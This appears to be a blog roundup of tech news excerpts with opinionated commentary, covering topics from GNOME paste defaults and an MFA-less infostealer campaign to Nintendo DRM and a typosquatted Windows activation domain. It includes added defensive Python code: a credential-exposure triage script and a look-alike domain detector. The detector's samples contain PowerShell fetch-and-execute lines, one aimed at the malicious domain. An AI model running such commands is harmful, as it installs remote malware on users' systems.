GNOME and Firefox Consider Disabling Middle Click Paste By Default

Both GNOME and Firefox are considering disabling middle-click paste by default, arguing it’s a confusing, accident-prone X11 relic that dumps clipboard contents without warning. Phoronix reports: A merge request for GNOME’s gsettings-desktop-schemas was opened this weekend to disable the primary-paste functionality by default that allows using the middle mouse button for pasting. Jordan Petridis argued in that GNOME pull request that middle-click paste is an “X11’ism” and that the setting could remain for those wanting to opt-in to enabling the functionality […].

The gsettings set org.gnome.desktop.interface gtk-enable-primary-paste true command would be a way of restoring the primary paste (middle click paste) for those desiring the functionality. The decision over the default has been tasked to GNOME’s design team for consideration.

Separately, Mozilla is also considering disabling middle mouse button paste by default too. […] Another option being considered is having the option to enable/disable it at either the GTK toolkit level or Wayland compositor level.

Looking at the comments, this is a hugely controversial move being pushed by the authors without any recognition that many people actually love having 2 clipboards. It may have been around for a long time, but this is a well-used feature. The keyboard has been around for a long time, but that is no reason to say: hey, it’s old. Let’s set a chorded keyboard as the default.

HP PC-in-a-keyboard for business

Announced on Monday at CES 2026, the HP EliteBoard G1a looks like a standard desktop keyboard, complete with 93 keys, including a number pad. Its keys have a solid 2 mm of travel, more than most laptops, and felt OK to type on during our brief hands-on, but it’s not mechanical so isn’t the best keyboard money can buy. However, look at the back surface and you’ll notice a small vent where air comes out and either two USB-C ports, or, on some SKUs, a single port with a built-in USB-C cable that hangs off it like a tail.

HP EliteBoard G1a

The idea is that you plug the EliteBoard G1a into a monitor that has USB-C video input and allow it to send data and get power over a single wire. Connect a wireless mouse and you’ve got your workstation covered. Maintain a similar monitor and mouse setup at home and you can carry just the keyboard back and forth.

If your monitor, like the majority on the market, doesn’t have a USB-C input, you can use an included USB-to-HDMI adapter to connect. You can use a 65 W USB-C power adapter to juice the G1a if it’s not getting electricity directly from the monitor.

The G1a weighs between 1.49 and 1.69 pounds, depending on config, and measures 14.1 in x 4.7 in x 0.7 inches, so it is more portable than most laptops, though it is longer and thicker than some. At its CES preview, HP showed off a long, thin envelope you can use to carry it and said it would also fit into any laptop bag that holds a 16-inch or larger laptop.

The G1a comes powered by an AMD Ryzen AI 5 or 7 (330, 340, or 350 Pro) with integrated AMD Radeon 800 graphics and an NPU that runs at up to 50 TOPS (Trillion Operations Per Second). Those specs make it a Copilot+ PC by Microsoft’s standards, which means you get certain offline AI features like Microsoft Recall, Click to Do, and Windows Studio Effects. You can get it with up to 64 GB of DDR5 5600 MT/s RAM and up to 2 TB of SSD storage, along with Wi-Fi 6E or 7 connectivity.

[…]

You’ll also be able to configure the G1a with or without a 32 Wh battery that HP claims can offer up to 3.5 hours of unplugged use or two days in sleep. It’s difficult to imagine a scenario where you’d need to use the keyboard without a power source, but having it be asleep while you carry it from one destination to another would be a huge plus.

[…]

Source: HP pushes PC-in-a-keyboard for businesses with hot desks • The Register

This is an absolutely brilliant idea.

One criminal stole info from 50 orgs thanks to no MFA

If you don’t say “yes way” to MFA, the consequences can be disastrous. Sensitive data belonging to about 50 global enterprises is listed for sale – and, in some cases, has already been sold – on the dark web following a major infostealer campaign, with apparent victims including American utility engineering firm Pickett and Associates; Japan’s homebuilding giant Sekisui House; and Spain’s largest airline Iberia.

The thief, who goes by the moniker Zestix or Sentap, steals data from corporate file-sharing portals by using compromised cloud credentials obtained from information-stealing malware. And none of the purported victims enforced multi-factor authentication (MFA), according to Hudson Rock, an Israeli cybersecurity company that specializes in infostealers.

Stolen credentials combined with a lack of MFA are always a recipe for disaster, as we have seen in earlier big breaches such as Change Healthcare, British Library, and Snowflake customers’ database hacks.

“Because the organizations listed below did not enforce MFA, the attacker walks right in through the front door,” the cybersecurity shop said in a Monday report. “No exploits, no cookies – just a password.”

We’re told Zestix gains access after employees inadvertently download infostealer-laden files to their devices. The stealer malware, such as RedLine, Lumma, or Vidar, then snarfs up saved credentials and browser history.

The cybercriminal, who has been operating as an initial access broker and extortionist since at least 2021, specifically targets enterprise file synchronization and sharing (EFSS) platforms like Progress Software’s ShareFile, Nextcloud, and OwnCloud.

[…]

Credential hygiene

The report illustrates the growing problem with infostealers, a favorite method of ransomware gangs and other financially motivated criminals.

It also highlights the growing trend of criminals simply logging in – not breaking in – to cloud accounts, which security experts have been warning about for the past couple of years.

Plus, as Hudson Rock reports, “while some credentials were harvested from recently infected machines, others had been sitting in logs for years, waiting for an actor like Zestix to exploit them.” This, the team adds, shows a “pervasive failure” in corporate credential hygiene with organizations neglecting to rotate passwords and invalidate sessions.

“It is time for organizations to enforce MFA and monitor their employees’ compromised credentials,” the security firm notes. We couldn’t agree more. ®

Source: One criminal stole info from 50 orgs thanks to no MFA • The Register
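
The credential-hygiene check the report calls for, as an added example (not code from The Register or Hudson Rock): it cross-references stealer-log exposure records against an account inventory and flags accounts whose exposed password was never rotated, whose sessions predate the exposure, or which lack enforced MFA. All field names, accounts, hostnames and dates are constructed assumptions.

```python
"""Credential-hygiene triage: added example, all data below is constructed."""
from dataclasses import dataclass
from datetime import date
from typing import Optional

SEVERITY_ORDER = {"critical": 0, "high": 1, "medium": 2}


@dataclass(frozen=True)
class Account:
    username: str
    portal: str                     # file-sharing portal hostname (assumed field)
    mfa_enforced: bool
    password_changed: date          # date of the last password rotation
    oldest_session: Optional[date]  # start of the oldest still-valid session


@dataclass(frozen=True)
class Exposure:
    username: str
    portal: str
    log_date: date                  # date of the stealer log holding the credential


@dataclass(frozen=True)
class Finding:
    username: str
    portal: str
    severity: str
    actions: tuple
    exposed_days: int               # how long the credential has sat in a log


def triage(accounts, exposures, today):
    """Return findings for exposed accounts, worst first."""
    by_key = {(a.username.lower(), a.portal.lower()): a for a in accounts}

    # Keep only the newest exposure per account: a rotation that predates
    # the newest log does not protect the account.
    latest = {}
    for exp in exposures:
        key = (exp.username.lower(), exp.portal.lower())
        if key not in latest or exp.log_date > latest[key].log_date:
            latest[key] = exp

    findings = []
    for key, exp in latest.items():
        acct = by_key.get(key)
        if acct is None:
            continue  # exposure is for an account we do not manage
        # A same-day rotation counts as still exposed: the order is unknown.
        password_live = acct.password_changed <= exp.log_date
        session_live = (acct.oldest_session is not None
                        and acct.oldest_session <= exp.log_date)
        actions = []
        if password_live:
            actions.append("rotate-password")
        if session_live:
            actions.append("invalidate-sessions")
        if not acct.mfa_enforced:
            actions.append("enforce-mfa")
        if not actions:
            continue
        if password_live and not acct.mfa_enforced:
            severity = "critical"   # the password alone is enough to log in
        elif password_live or session_live:
            severity = "high"
        else:
            severity = "medium"     # rotated, but still single-factor
        findings.append(Finding(acct.username, acct.portal, severity,
                                tuple(actions), (today - exp.log_date).days))
    findings.sort(key=lambda f: (SEVERITY_ORDER[f.severity], f.username))
    return findings


# Constructed sample data; no real accounts, portals or logs.
PORTAL = "files.example.com"
ACCOUNTS = [
    Account("alice@example.com", PORTAL, False, date(2021, 3, 1), None),
    Account("bob@example.com", PORTAL, True, date(2025, 11, 1), date(2025, 12, 1)),
    Account("carol@example.com", PORTAL, True, date(2025, 12, 28), None),
    Account("dave@example.com", PORTAL, False, date(2025, 12, 28), date(2025, 12, 29)),
]
EXPOSURES = [
    Exposure("alice@example.com", PORTAL, date(2021, 1, 1)),   # older log, superseded
    Exposure("Alice@Example.com", PORTAL, date(2022, 6, 10)),  # years old, never rotated
    Exposure("bob@example.com", PORTAL, date(2025, 12, 20)),
    Exposure("carol@example.com", PORTAL, date(2025, 12, 20)),
    Exposure("dave@example.com", PORTAL, date(2025, 12, 20)),
    Exposure("erin@example.com", PORTAL, date(2025, 12, 20)),  # not in the inventory
]

if __name__ == "__main__":
    for f in triage(ACCOUNTS, EXPOSURES, date(2026, 1, 6)):
        print(f"{f.severity:8} {f.username:20} exposed {f.exposed_days}d "
              f"-> {', '.join(f.actions)}")
```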

VW’s New Year’s Resolution Is to Bring Back Physical Buttons

  • Volkswagen revealed a new generation of cockpit design with the refreshed ID. Polo.
  • The new design marks a big departure for VW and features a plethora of physical controls rather than the capacitive buttons on current models.
  • While the switchgear is currently only found on the new ID. Polo, which isn’t sold in the United States, it could debut on the soon-to-be-refreshed ID.4.

Volkswagen is making a drastic change to its interiors, or at least the interiors of its electric vehicles. The automaker recently unveiled a new cockpit generation with the refreshed ID. Polo—the diminutive electric hatchback that the brand sells in Europe—that now comes with physical buttons.

While VW certainly isn’t the only automaker that pushed the envelope with haptic controls and digital buttons, it was a particularly egregious offender. Now, the company is doing a complete 180-degree shift, adding a full suite of physical buttons and switchgear to the Polo’s interior.

The steering wheel gets new clusters of buttons for cruise control and interacting with music playback, while switches for the temperature and fan speed now live in a row along the dashboard. The move back to buttons doesn’t come out of nowhere. Volkswagen already started the shift with the new versions of the Golf and Tiguan models in the United States. Unfortunately, some climate controls, such as those for the rear defrost and the heated seats, are still accessed through the touchscreen. Thankfully, they look to retain their dedicated spot at the bottom of the display.

Volkswagen hasn’t announced which models will receive the new cockpit design. The redesigned interior also may be limited to the brand’s electric vehicles, which would limit it to the upcoming refresh for the ID.4 SUV (and potentially the ID.Buzz), as the only VW EV models currently sold in America.

Source: VW’s New Year’s Resolution Is to Bring Back Physical Buttons

Also unfortunately, the music control buttons seem to be limited to the steering wheel. Having your passenger reach out to select a radio station on your steering wheel feels suboptimal to me. But it’s a start.

Vietnam forces video ads to be shorter than 5 seconds and easy to close

The Government has just issued Decree No. 342 detailing a number of articles of the Advertising Law, which for the first time sets strict requirements for advertising in the online environment. Notably, platforms may not force users to view ads for more than 5 seconds and must allow ads to be turned off with just 1 touch.

[…] Do not “force” users to watch ads for more than 5 seconds

One of the notable new points of the Decree is the specific regulation of non-positional advertising – the type of ad that appears at a location and time that are not fixed, and can obscure the whole or part of the main content and interrupt the user experience.

According to the new decree from February 15, social media users will not be disturbed with long promotional videos, uncensored content. Illustration: lectnews

Article 17 of the Decree requires platforms to design clear ad-off features and icons, ensuring users need only one interaction to turn off ads. It is strictly forbidden to use ad-off symbols that are fake, confusing or difficult to recognize.

In particular, the Decree stipulates that there is no waiting time to turn off still-image ads. With moving or video image-chain ads, the maximum waiting time to turn off ads is only 5 seconds.

In addition, platforms must clearly provide and guide users on how to report ads that violate the law, while also allowing them to reject, turn off or stop viewing inappropriate ads. These reports must be received, promptly processed and the user notified in accordance with regulations.

[…]

Source: From 15/2, video ads are not forced users to watch for more than 5 seconds – Women’s Newspaper

Google starts to close Android sources, will only release code twice a year now

The operating system that powers every Android phone and tablet on the market is based on AOSP, short for the Android Open Source Project. Google develops and releases AOSP under the permissive Apache 2.0 License, which allows any developer to use, modify, and distribute their own operating systems based on the project without paying fees or releasing their own modified source code. Since beginning the project, Google released the source code for nearly every new version of Android for mobile devices, typically doing so within days of rolling out the corresponding update to its own Pixel mobile devices. Starting this year, however, Google is making a major change to its release schedule for Android source code drops: AOSP sources will only be released twice a year.

Google told Android Authority that, effective 2026, Google will publish new source code to AOSP in Q2 and Q4. The reason is to [blah blah bullshit]

[…]

Source: Google will now only release Android source code twice a year

With competition getting under way from the likes of Sailfish to satisfy an increasing number of people seeking to get out from under the thumbs of Android and IOS, Google is closing the system so that alternatives can’t use their work to help create better products.

Lenovo Ultrawide Gaming Laptop That Uses a Rollable Screen

Lenovo wants to make rolling screens more ubiquitous. These flexible screens can extend out from their normal aspect ratio, so a device like the ThinkBook Gen 6 Rollable can go from a 14-inch laptop to a 16-inch screen. Gamers, on the other hand, may want something wider than taller. Lenovo’s latest concept accomplishes just that, and it makes more sense than you may initially think.

Lenovo’s Legion Pro Rollable concept is essentially the company’s existing Legion Pro 7i, but the 240Hz OLED screen is replaced with a flexible display. In its default state, the screen sticks to the standard 16 inches. With a press of the Fn and arrow keys, you can extend the screen to a further 21.5 inches in “tactical” mode and 24 inches in “arena” mode. At its max width, the screen appears far more like my typical desktop monitor—wide enough for my gaming habits.

These two wings expand thanks to an internal pulley system that pulls the screens in and out of the laptop lid. © Kyle Barr / Gizmodo

The mechanism inside the laptop lid is similar to what Lenovo has tried with its ThinkPad Rollable XD concept. It’s using high-tensile cables and a system of pulleys to drag the displays into place. This is an early concept, and some features don’t work like you imagine they would.

[…]

Without getting hung up on the details, the Legion Pro Rollable is the kind of concept that’s helping me maintain an ounce of excitement for gaming laptops. Having used the ThinkBook Rollable, I know that having variable screen sizes is more useful than you may initially think. The Legion Pro Rollable is being marketed for esports

[…]

Source: Lenovo Thinks You Want an Ultrawide Gaming Laptop That Uses a Rollable Screen

HSBC blocks app users for having sideloaded password manager

[…] Neil Brown, board member at F-Droid, said he was blocked from accessing HSBC’s UK mobile banking after a security screen flagged Bitwarden as a risk. Brown had installed the password manager via F-Droid rather than Google Play.

Bitwarden, an open source password manager, is available through official channels including Google Play and Galaxy stores, as well as via F-Droid sideloading.

HSBC didn’t provide The Register with a clear answer on why it won’t allow a sideloaded Bitwarden installation to coexist with its app on the same device.

Representatives from both F-Droid and Bitwarden suspect the issue stems from HSBC’s side.

Gary Orenstein, chief customer officer at Bitwarden, told us: “It seems that HSBC has chosen a level of security and permissions for their mobile app that allows the HSBC app to see if there are other apps on the phone not installed from the Google Play store, and if one is found, to disallow the install of the HSBC app.”

[…]

Source: HSBC blocks app users for having sideloaded password manager • The Register

There are many great reasons to install apps from things that aren’t the Google Play Store, privacy and freedom of choice being a major one – especially with people trying to escape the Google / Apple duopoly by jumping to other OSs like Sailfish (on the Jolla Phone). Not being able to access your banking app is a major problem. I guess it’s time to start changing banks as well then!

MacOS Logitech mice stop working due to cloud certificate being invalid. Apple shakedown turns hardware into junk.

If you’re among the macOS users experiencing some weird issues with your Logitech mouse, then good news: Logitech has now released a fix. This comes after multiple Reddit users reported yesterday that Logi Options Plus — the app required to manage and configure the controls on Logitech accessories — had stopped working, preventing them from using customized scrolling features, button actions, and gestures.

One Reddit user said that the scroll directions and extra buttons on their Logitech mouse “were not working as I intended” and that the Logi Options Plus app became stuck in a boot loop upon opening it to identify the cause. Logitech has since acknowledged the situation and said that its G Hub app — a similar management software for gaming devices under the Logitech G brand — was also affected.

According to Logitech’s support page, the problem was caused by “an expired certificate” required for the apps to run. Windows users were unaffected. The issues only impacted Mac users because macOS prevents certain applications from running if it doesn’t detect a valid Developer ID certificate, something that has affected other apps in the past.

So Apple requires the maker of hardware to pay them a subscription to be able to use the hardware?! It’s a mouse, not a piece of rocket science! If your hardware supplier goes bust, your hardware turns into junk.

This Free Script Disables Every AI Feature in Windows 11

If you’d like your operating system to go back to being an operating system, check out RemoveWindowsAI. This free script changes various registry keys to disable AI features including Copilot, Recall, and the Copilot integrations in applications including Edge, Paint, and Notepad. Using various workarounds, it then configures Windows Update to not install those updates again (the documentation breaks the process down, if you’re interested).

[…]

To start the script you will need to copy a command from the Github page for RemoveWindowsAI and paste it into your PowerShell window (I’m not including the command directly here in case it changes in the future). Once you do, the user interface will show up, allowing you to choose which AI features you want to disable. Make your choices and watch the changes take place in the PowerShell window.

[…]

Source: This Free Script Disables Every AI Feature in Windows 11 | Lifehacker

The Pebble Round 2 is here, and it fixes the original’s biggest flaws

2025 was a surprisingly big year for Pebble fans. Last March, former Pebble CEO Eric Migicovsky unexpectedly launched two new Pebble smartwatches: the Pebble 2 Duo and the Pebble Time 2. Now, on just the second day of 2026, Migicovsky has announced a third Pebble smartwatch — the Pebble Round 2.

For all intents and purposes, the Pebble Round 2 is a spiritual successor to the Pebble Time Round, Pebble’s excellent circular smartwatch that was released in 2015. At first glance, the new watch looks indistinguishable from its older sibling. However, there are a couple of key upgrades that fix the original Pebble Time Round’s biggest flaws.

The first is the display. Where the Pebble Time Round featured a 1-inch screen, the Pebble Round 2 has a 1.3-inch screen. A 0.3-inch size upgrade may not sound like much on paper, but as you can see from the photos above, it’s a night-and-day difference when looking at the Pebble Round 2 and Pebble Time Round side by side — largely thanks to the drastically reduced bezels on the new watch.

In addition to the larger size, the Pebble Round 2’s screen is also higher quality, featuring a 260 x 260 resolution that’s twice as sharp as the OG Pebble Time Round. The screen is also now optically bonded, resulting in greatly improved viewing angles compared to the previous model.

The other big upgrade is battery life. Migicovsky says the Pebble Round 2 should last 10 to 14 days per charge, a massive increase over the two days of battery life provided by the original Pebble Time Round (primarily due to newer, more efficient Bluetooth technology). Although it’s not as impressive as the 30-day battery life offered by the other two Pebble watches announced a few months ago, it’s still incredible endurance considering how light and thin the Pebble Round 2 is.

[…]

It has step and sleep tracking, a compass, two microphones, and 30m water resistance. Compared to the Pebble Time 2, the two most prominent missing features on the Pebble Round 2 are a heart rate monitor and a speaker.

[…]

Source: The Pebble Round 2 is here, and it fixes the original’s biggest flaws

LG forced a Copilot web app onto its TVs but will now let you delete it

LG says it will let users delete the Microsoft Copilot shortcut it installed on newer TVs after several reports highlighted the unremovable icon. In a statement to The Verge, LG spokesperson Chris De Maria says the company “respects consumer choice and will take steps to allow users to delete the shortcut icon if they wish.”

Last week, a user on the r/mildlyinfuriating subreddit posted an image of the Microsoft Copilot icon in their lineup of apps on an LG TV, with no option to delete it. “My LG TV’s new software update installed Microsoft Copilot, which cannot be deleted,” the post says. The post garnered more than 36,000 upvotes as people grow more frustrated with AI popping up just about everywhere.

Both LG and Samsung announced plans to add Microsoft’s Copilot AI assistant to their TVs in January, but it appears to be popping up on LG TVs following a recent update to webOS.

De Maria adds that the icon is a “shortcut” to the Microsoft Copilot web app that opens in the TV’s web browser, rather than “an application-based service embedded in the TV.” He also adds that “features such as microphone input are activated only with the customer’s explicit consent.”

Asked when LG will start letting users delete the Copilot icon, De Maria said there’s no “definitive timing” yet.

Here’s LG’s full statement:

Following recent coverage regarding the arrival of Microsoft Copilot on LG TVs, we’re reaching out to provide an important clarification. Based on recent coverage regarding the arrival of Microsoft Copilot on LG TVs, we want to clarify that Microsoft Copilot is provided as a shortcut icon to enhance customer accessibility and convenience. It is not an application-based service embedded in the TV. When users select the Copilot shortcut, Microsoft’s website opens through the TV’s web browser, and features such as microphone input are activated only with the customer’s explicit consent.

Source: LG forced a Copilot web app onto its TVs but will let you delete it | The Verge

Apple becomes a debt collector with its new developer agreement, could randomly deduct money it believes it should get if devs use external payment processor or app store

Apple on Wednesday released an updated developer license agreement that gives the company permission to recoup unpaid funds, such as commissions or any other fees, by deducting them from in-app purchases it processes on developers’ behalf, among other methods.

The change will impact developers in regions where local law allows them to link to external payment systems. In these cases, developers must report those payments back to Apple to pay the required commissions or fees.

The changed agreement seemingly gives Apple a way to collect what it believes is the correct fee if the company determines a developer has underreported their earnings.

Apple’s policies in this area are complex, but the change could impact developers in markets like the EU, U.S., and, now, Japan, where developers using external payment systems may be required to pay Apple varying fees or commissions depending on local law. (In the U.S., the legality of these commissions is still being disputed. A federal appeals court earlier this month ruled that a district court should consider allowing Apple to collect some commission, though not the full 27% fee it previously charged.)

In its new developer agreement, Apple states it will “offset or recoup” what it believes it is owed, including “any amounts collected by Apple on your behalf from end-users.” This means Apple could recoup funds from developers’ in-app purchases — like those for digital goods, services, and subscriptions — or from one-time fees for paid applications.

Additionally, Apple notes that it has the right to collect this money “at any time” and “from time to time,” meaning developers could face surprise deductions if Apple believes they’ve miscalculated what they owe.

The agreement doesn’t specify how Apple will determine whether it’s owed money.

The types of developer payments that vary over time are limited and include commissions, fees, and taxes. Among these is the Core Technology Fee (CTF) in the EU, which currently costs €0.50 for each first annual install exceeding one million in the past 12 months. In January 2026, Apple will transition from the CTF to a new fee, called the Core Technology Commission (CTC), a more complicated percentage-based fee. Apple will collect the CTC from apps that use external payment methods or are distributed under its alternative business terms for the EU.

The updated developer agreement also gives Apple the right to collect unpaid amounts from any “affiliates, parents, or subsidiaries” related to the account that owes money. In practical terms, that means Apple could collect the money from developers’ other apps, or from apps published by a parent company.

[…]

Source: Apple becomes a debt collector with its new developer agreement | TechCrunch

So after being forced by the EU (and others) to allow external payment providers and app stores, Apple then went into a hissy fit and started stamping its feet against these rulings, trying everything to keep extorting anyone selling anything on an IOS device. Now it’s just going to take what it believes is theirs – and you had better believe there will be no recourse.

Apple thinks it can argue its way out of EU DMA with a single comma. No it can’t and this fight will cost it billions in Europe

EU to force Apple to open up IOS for developers

Apple tries again to make EU officials happy with new fees for in-app purchases

Apple stamps feet but now to let EU developers distribute apps from the web

Apple reverses hissy fit decision to remove Home Screen web apps in EU

EU forces Apple to open up to third-party app stores and payments. Details emerge what it will look like.

I can have app store? Apple: yes but NO! Give €1,000,000 + lock in to Apple ecosystem. This is how to “comply” with EU anti competition law

 

Hubble Sees Possible Runaway Black Hole Creating a Trail of Stars

[…] if it were in our solar system, it could travel from Earth to the Moon in 14 minutes. This supermassive black hole, weighing as much as 20 million Suns, has left behind a never-before-seen 200,000-light-year-long “contrail” of newborn stars, twice the diameter of our Milky Way galaxy. It’s likely the result of a rare, bizarre game of galactic billiards among three massive black holes.

Rather than gobbling up stars ahead of it, like a cosmic Pac-Man, the speedy black hole is plowing into gas in front of it to trigger new star formation along a narrow corridor.

[…] Nothing like it has ever been seen before, but it was captured accidentally by NASA’s Hubble Space Telescope.

This is an artist’s impression of a runaway supermassive black hole that was ejected from its host galaxy as a result of a tussle between it and two other black holes. As the black hole plows through intergalactic space it compresses tenuous gas in front of it. This precipitates the birth of hot blue stars. This illustration is based on Hubble Space Telescope observations of a 200,000-light-year-long “contrail” of stars behind an escaping black hole.
NASA, ESA, Leah Hustak (STScI)

“We think we’re seeing a wake behind the black hole where the gas cools and is able to form stars. So, we’re looking at star formation trailing the black hole,” said Pieter van Dokkum of Yale University in New Haven, Connecticut. “What we’re seeing is the aftermath. Like the wake behind a ship we’re seeing the wake behind the black hole.” The trail must have lots of new stars, given that it is almost half as bright as the host galaxy it is linked to.

The black hole lies at one end of the column, which stretches back to its parent galaxy. There is a remarkably bright knot of ionized oxygen at the outermost tip of the column. Researchers believe gas is probably being shocked and heated from the motion of the black hole hitting the gas, or it could be radiation from an accretion disk around the black hole. “Gas in front of it gets shocked because of this supersonic, very high-velocity impact of the black hole moving through the gas. How it works exactly is not really known,” said van Dokkum.

“This is pure serendipity that we stumbled across it,” van Dokkum added. He was looking for globular star clusters in a nearby dwarf galaxy. “I was just scanning through the Hubble image and then I noticed that we have a little streak. I immediately thought, ‘oh, a cosmic ray hitting the camera detector and causing a linear imaging artifact.’ When we eliminated cosmic rays we realized it was still there. It didn’t look like anything we’ve seen before.”

This Hubble Space Telescope archival photo captures a curious linear feature that is so unusual it was first dismissed as an imaging artifact from Hubble’s cameras. But follow-up spectroscopic observations reveal it is a 200,000-light-year-long chain of young blue stars. A supermassive black hole lies at the tip of the bridge at lower left. The black hole was ejected from the galaxy at upper right. It compressed gas in its wake to leave a long trail of young blue stars. Nothing like this has ever been seen before in the universe. This unusual event happened when the universe was approximately half its current age.
NASA, ESA, Pieter van Dokkum (Yale); Image Processing: Joseph DePasquale (STScI)

Because it was so weird, van Dokkum and his team did follow-up spectroscopy with the W. M. Keck Observatories in Hawaii. He describes the star trail as “quite astonishing, very, very bright and very unusual.” This led to the conclusion that he was looking at the aftermath of a black hole flying through a halo of gas surrounding the host galaxy.

[…]

Source: Hubble Sees Possible Runaway Black Hole Creating a Trail of Stars – NASA Science

New Nintendo DRM allows them to remotely brick the device you bought permanently – you don’t own what you bought part XXX

In the lead up to its Switch 2 console release, Nintendo updated its user agreement and asserted broad authority to make consoles owned by its customers permanently unusable. Under Nintendo’s most aggressive digital restrictions management (DRM) update to date, game console owners are now required to give Nintendo the unilateral right to revoke access to games, security updates, and the Internet, at its sole discretion. The new agreement states:

“You acknowledge that if you fail to comply with [Nintendo’s restrictions], Nintendo may render the Nintendo Account Services and/or the applicable Nintendo device permanently unusable in whole or in part.”

These new, wide-sweeping restrictions affect a large number of users for many different reasons. There are probably other reasons that Nintendo has and will justify bricking game consoles, but here are some that we have seen reported:

  • “Tampering” with hardware or software in pretty much any way;
  • Attempting to play a back-up game;
  • Playing a “used” game; or
  • Use of a third-party game or accessory.

When Nintendo remotely bricks a perfectly-functional device, the game console becomes effectively useless. Users are blocked from ever accessing the Internet again with the system, which in turn restricts services like eShop (the digital distribution service for the Nintendo Switch), online play, using the subscription-based Nintendo Switch Online (which includes access to retro game catalogs and the ability to back up game data), game download (including previously-purchased codes and “game-key” cartridges), and security patches. As if blocking Internet access alone wasn’t enough, a bricked device is no longer able to play downloaded games, either. These restrictions don’t just apply to the user who broke Nintendo’s extremely strict user agreements: the block is for the life of the device, no matter who owns it.

No proprietor should have the power to brick your device at its discretion.

Nintendo’s promise to block a user from using their game console isn’t just an empty threat: it has already been wielded against many users.

[…]

Source: New Nintendo DRM bans consoles, makes users beg for forgiveness — Free Software Foundation — Working together for free software

Samsung is putting Google Gemini AI into your refrigerator and wine cellar, whether you need it or not

Samsung is heading into CES 2026 with a familiar message wrapped in a slightly stranger package. You see, the company plans to unveil an updated lineup of kitchen appliances, led by new versions of its Bespoke AI refrigerator, wine cellar, slide in range, and over the range microwaves. What makes this year different is not the stainless finish or the tighter installation tolerances. It is the decision to push Google Gemini directly into the kitchen, starting with a refrigerator that can see what you eat and tell the cloud about it. Yes, really.

At the center of the announcement is the latest Bespoke AI Refrigerator Family Hub from Samsung Electronics. Samsung says this model upgrades its existing AI Vision system with functionality built using Google Gemini, marking the first time Gemini is being integrated into a refrigerator. Previously, the system could recognize a limited number of fresh and pre registered foods locally. The new version is designed to identify more items automatically, including processed foods that no longer require manual setup and leftovers stored in personal containers.

On paper, that sounds convenient. A fridge that knows what is inside it, keeps an updated inventory, and helps manage groceries without constant user input is an idea appliance makers have chased for years. Samsung says more accurate ingredient recognition should make food tracking clearer and easier, while unlocking new use cases around meal planning and personalization. Whether that translates into daily value or becomes another ignored dashboard remains an open question.

Samsung is also extending the same vision based approach to its new Bespoke AI Wine Cellar. A camera mounted inside the unit scans bottle labels as wine is added or removed, tracking inventory through the SmartThings AI Wine Manager. The system knows which shelf each bottle sits on and can surface pairing suggestions based on what is currently stored. For collectors with larger wine inventories, this could genuinely save time. For everyone else, it may feel like a high tech solution searching for a problem.

The elephant in the room is cloud dependency. These AI features are built in collaboration with Google Cloud, which raises predictable questions about data handling, long term support, and what happens when services change or are discontinued. A refrigerator is expected to last many years. Cloud based AI services do not have the same track record. Samsung has not detailed how much processing happens locally versus in the cloud, nor how users can limit or disable data sharing if they choose.

[…]

Source: Samsung is putting Google Gemini AI into your refrigerator, whether you need it or not

Fake MAS Windows activation domain used to spread PowerShell malware

A typosquatted domain impersonating the Microsoft Activation Scripts (MAS) tool was used to distribute malicious PowerShell scripts that infect Windows systems with the ‘Cosmali Loader’.

BleepingComputer has found that multiple MAS users began reporting on Reddit [1, 2] yesterday that they received pop-up warnings on their systems about a Cosmali Loader infection.

You have been infected by a malware called ‘cosmali loader’ because you mistyped ‘get.activated.win’ as ‘get.activate[.]win’ when activating Windows in PowerShell.

The malware’s panel is insecure and everyone viewing it has access to your computer.

Reinstall Windows and don’t make the same mistake next time.

For proof that your computer is infected, check Task Manager and look for weird PowerShell processes.

Based on the reports, attackers have set up a look-alike domain, “get.activate[.]win,” which closely resembles the legitimate one listed in the official MAS activation instructions, “get.activated.win.”

Given that the difference between the two is a single character (“d”), the attackers bet on users mistyping the domain.

Source: Fake MAS Windows activation domain used to spread PowerShell malware
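
The single-character difference described above is the kind of thing an edit-distance check catches. The following is an added example, not code from BleepingComputer or the MAS project: it scans command lines for hosts within two edits of an allowlisted domain. The allowlist, the threshold and the sample lines are assumptions constructed for illustration, and the transposed domain on the third line is made up.

```python
import re

# Assumption: a locally maintained allowlist. The only entry taken from the
# article is the legitimate MAS domain.
TRUSTED = {"get.activated.win"}
MAX_DIST = 2  # assumption: flag hosts within two edits of a trusted name

# Host-like tokens; the lookahead stops "backup.ps1" matching as "backup.ps".
HOST_RE = re.compile(r"(?:https?://)?((?:[a-z0-9-]+\.)+[a-z]{2,})(?![a-z0-9-])", re.I)


def refang(text):
    """Undo report-style defanging (get.activate[.]win) before matching."""
    return text.replace("[.]", ".").replace("hxxp", "http")


def defang(host):
    """Re-defang a host so alerts never contain a clickable look-alike."""
    head, _, tld = host.rpartition(".")
    return f"{head}[.]{tld}"


def osa_distance(a, b):
    """Optimal string alignment distance: insert, delete, substitute,
    or swap two adjacent characters, each costing one edit."""
    prev2, prev = None, list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cost = 0 if ca == cb else 1
            best = min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + cost)
            if i > 1 and j > 1 and ca == b[j - 2] and a[i - 2] == cb:
                best = min(best, prev2[j - 2] + 1)  # adjacent transposition
            cur.append(best)
        prev2, prev = prev, cur
    return prev[-1]


def classify(host):
    """Return (verdict, nearest trusted domain, distance) for one host."""
    host = host.lower()
    if host in TRUSTED:
        return ("trusted", host, 0)
    nearest = min(TRUSTED, key=lambda t: osa_distance(host, t))
    dist = osa_distance(host, nearest)
    if dist <= MAX_DIST:
        return ("lookalike", nearest, dist)
    return ("unrelated", None, dist)


def scan(lines):
    """Return (line number, defanged host, trusted name, distance) per hit."""
    findings = []
    for n, line in enumerate(lines, 1):
        for host in HOST_RE.findall(refang(line)):
            verdict, nearest, dist = classify(host)
            if verdict == "lookalike":
                findings.append((n, defang(host.lower()), nearest, dist))
    return findings


# Constructed sample command lines (not real telemetry); look-alikes are defanged.
SAMPLE_LINES = [
    'powershell.exe -c "irm https://get.activated.win | iex"',
    'powershell.exe -c "irm https://get.activate[.]win | iex"',
    'powershell.exe -c "irm https://get.actviated[.]win | iex"',
    r"powershell.exe -File C:\Scripts\backup.ps1",
    "curl https://example.com/file",
]

if __name__ == "__main__":
    for line_no, host, trusted, dist in scan(SAMPLE_LINES):
        print(f"line {line_no}: {host} is {dist} edit(s) from {trusted}")
```

The same comparison can be applied to DNS or proxy logs, where the host is already a separate field and the regular expression is not needed.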

Samsung Releases new Odyssey gaming monitors, including 27″ glasses free 3D

[…]

Samsung Odyssey 3D G9 – G90XF 27”

